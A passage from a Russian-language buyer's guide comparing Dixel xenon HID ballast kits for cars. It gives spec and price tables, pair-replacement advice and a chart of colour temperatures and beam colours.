Dixel Slim AC (9-16V) 35W Pink | 35 | 9-16 (12 – рабочее, для легковых ТС) | Металл/3200 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel Slim 9-32V AC (9-16V) 35W Pink | 35 | 9-16 (12 – рабочее, легков.)9-32 (24 – грузов.) | Металл / 3200 | H1, H3, H4 моно, Н4 галоген, Н7, Н11 (H8/H9/H16?), Н16 (PSX24W), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006), D2h (D2s с проводами) |
Dixel Premium X1S-Series D1/Ket-02/2-Can-Bus 38W 12V Pink | 35 | 9-16 (12 – рабочее, для легковых ТС) | Керамика/3200 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel AC (9-16V) 35W Pink | 35 | 9-16 (12 –легков., средн.) | Металл/3200 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel Premium X1S-Series D1/Ket-02/2-Can-Bus 38W 12V Pink | 35 | 9-16 (12 –легков., средн.) | Керамика/3200 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
HID Slim AC (9-16V) 35W Pink | 35 | 9-16 (12 –легков., средн.) | Металл/3200 | H1, H3, H4 моно, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel Premium Slim NEW (2022)AC (9-16V) 35W Pink | 35 | 9-16 (12 –легков., средн.) | Керамика/3200 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel FF3-2CanBus AC (9-16V) 35W Pink | 55 | 9-16 (12 –легков., средн.) | Металл/3800 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Dixel Premium Slim Fast Start AC (9-16V) 55W Pink | 55 | 9-16 (12 –легков., средн.) | Керамика/3800 | H1, H3, Н7, Н11 (H8/H9/H16?), Н27 (880/881), НВ3 (9005) (H10), НВ4 (9006) |
Продолжение таблицы:
Модель, бренд | Технические и эксплуатационные характеристики | Цена, руб. | ||
Типоразмер блока розжига | Обманка | «Быстрый розжиг» | ||
Dixel Slim AC (9-16V) 35W Pink | 5-е поколение – «Тонкие» Slim | — | — | 2540 |
Dixel Slim 9-32V AC (9-16V) 35W Pink | 5-е поколение – «Тонкие» Slim | — | — | 3390 |
Dixel Premium X1S-Series D1/Ket-02/2-Can-Bus 38W 12V Pink | Средний «MIDslim» | 6290 | ||
Dixel AC (9-16V) 35W Pink | 4-го поколения, стандартные | — | — | 2690 |
Dixel Premium X1S-Series D1/Ket-02/2-Can-Bus 38W 12V Pink | Средний «MIDslim» | 6290 | ||
HID Slim AC (9-16V) 35W Pink | 5-е поколение – «Тонкие» Slim | — | — | 2490 |
Dixel Premium Slim NEW (2022)AC (9-16V) 35W Pink | 5-е поколение – «Тонкие» Slim | — | — | 3590 |
Dixel FF3-2CanBus AC (9-16V) 35W Pink | 5-е поколение – «Тонкие» Slim | — | 3590 | |
Dixel Premium Slim Fast Start AC (9-16V) 55W Pink | 5-е поколение – «Тонкие» Slim | — | 3890 |
Практически на все экземпляры широкого ассортимента большинство производителей на свою продукцию дают гарантию – 12 месяцев.
В основном в комплектацию входят следующие позиции:
- блок розжига указанного бренда – 2 шт.;
- лампы такого же бренда, как и блок – 2 шт. (металл, пластик);
- картонная коробка.
Еще важно обращать внимание на такие характеристики ламп, как уровень температуры, который был уже ранее освещен в данной теме.
Вес ламп играет большую роль, ведь нужно знать, насколько они будут утяжелять такую конструкцию, как фары. Размер ламп, их совпадение с разъемами.
Если, допустим, производитель предусмотрел лампы для разъема КЕТ-02, тогда этот показатель должен отражаться в инструкции, технических характеристиках новой пары ламп.
Обращают внимание также на:
длину входного шлейфа | напр., 360 мм |
температуру в диапазонах и динамике | напр., -40 до 105 градусов по Цельсию |
уровень напряжения на входе | напр., 9-16В, 3,2А |
скорость включения | напр., 20-25 сек. для ламп 5-го поколения |
какие используются провода, изоляция | |
нагрев | напр., низкий |
яркость | напр. в 2 или 3 раза ярче, чем галогенка |
часы сроков службы и прочие возможности осветительного приспособления | напр., 3000 ч |
Когда «грозит» какой-либо лампе замена, то нужно помнить, что основным правилом ремонта световой системы в автомобиле, является парная перестановка лампа в одной фаре.
Если вы выбросите испорченную одну лампочку, и вставите новую, то между оставшейся не испорченной и новой лампой могут быть разные несовместимости.
Не совпадать могут мощности, размеры, производитель (например, на упаковке написано – Италия, а на самом деле сборка была сделана в Китае)
Это может привести к нежелательному мерцанию ламп, бесконтактности, выходу из строя устройства.
Характеристики и температура
Чтобы ксеноновые лампы полноценно и долго горели в фарах автотранспортного средства, необходим подходящий блок розжига (или – «балласт»).
В отсутствии такового осветительные приспособления попросту будут иметь критически минимальный срок эксплуатации. Каждый блок должен подходит под разновидность ламп, и обслуживать их в паре.
Даже замена одной лампочки такого типа все6гда происходит в паре с той, что еще годна. Таковы правила безопасности и сохранности электрики автомобиля.
На разные оттенки цветовой гаммы светового пучка ламп влияет определенная температура. Особенно, если учесть, что внутри колбы нет никаких вольфрамовых или иных нитей накаливания. Внутри имеется газовая смесь.
Чтобы она светилась разным цветом, благодаря блоку розжига, температура нагрева вещества подается разного уровня после зажигания оптического устройства.
Всего отмечают следующие оттенки ксенонов, которые мы представляем для изучения в таблице:
Температура свечения (единица измерения – Кельвины, К) | Цвет светового пучка |
3000 | — желтый; — затемненный желтый |
3500 | — красный; — желтый; — желто-красный. |
4300-4500 | — светленный желтый; — желтый с белизной; — молочный белый. |
5000 | — белый; — яркий снежно-белый. |
6000 | — голубой осветленный («Голубой Кристалл»); — голубой. |
От 8000 и выше (напр., 10000 К) | — затемненный голубой; — фиолетовый; — розовый. |
Принцип перехода оттенков к голубизне следующий – чем выше температурный показатель Кельвинов, тем темнее, ближе к смеси с голубым, синим будет оттенок.
И, наоборот, чем меньше показатели Кельвинов, тем ближе цвет станет к желтому варианту, а еще дальше – к белому. Но есть еще один главный принцип – чем выше температурный уровень свечения, тем тусклее будет свет.
Самые яркие лампы имеют температурный режим самый низкий из стандартного перечня. К штатному ксенону относятся лампочки с оптимальным уровнем температурного режима – 4300 К.